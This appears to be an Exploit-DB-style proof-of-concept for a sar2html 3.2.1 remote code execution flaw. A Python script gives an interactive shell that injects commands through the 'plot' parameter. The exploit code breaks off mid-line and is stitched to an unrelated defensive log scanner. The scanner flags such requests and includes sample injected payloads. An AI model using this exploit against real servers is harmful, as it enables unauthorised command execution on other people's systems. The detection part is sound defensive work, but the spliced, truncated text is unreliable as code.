# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "

    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not i
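A defender's view of the request the script above sends (`index.php?plot=;<command>`): this added example, which is not part of the original exploit or of the sar2html project, scans web-server access-log lines for `plot` values that contain shell metacharacters, including URL-encoded ones. The log lines, the function names and the metacharacter set are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumed metacharacter set: characters that let a value break out into a shell.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# Request line inside a combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def plot_values(query):
    """Decoded values of every 'plot' parameter in a raw query string."""
    values = []
    # Split on '&' only, so a raw ';' stays inside the value being inspected.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "plot":
            values.append(unquote_plus(value))
    return values


def scan(lines):
    """Return (line_number, decoded_plot_value) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/index.php"):
            continue
        for value in plot_values(target.query):
            if SHELL_META.search(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (documentation address ranges, made-up values).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Dec/2020:10:00:01 +0000] "GET /index.php?plot=host1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Dec/2020:10:00:09 +0000] "GET /index.php?plot=;id HTTP/1.1" 200 5301',
    '203.0.113.7 - - [27/Dec/2020:10:00:15 +0000] "GET /sar2html/index.php?plot=%3Buname%20-a HTTP/1.1" 200 5340',
    '198.51.100.4 - - [27/Dec/2020:10:01:00 +0000] "GET /about.php?plot=;id HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious plot value {value!r}")
```

Only GET, POST and HEAD request lines are matched, and a value that is URL-encoded twice is decoded once, so it is not flagged.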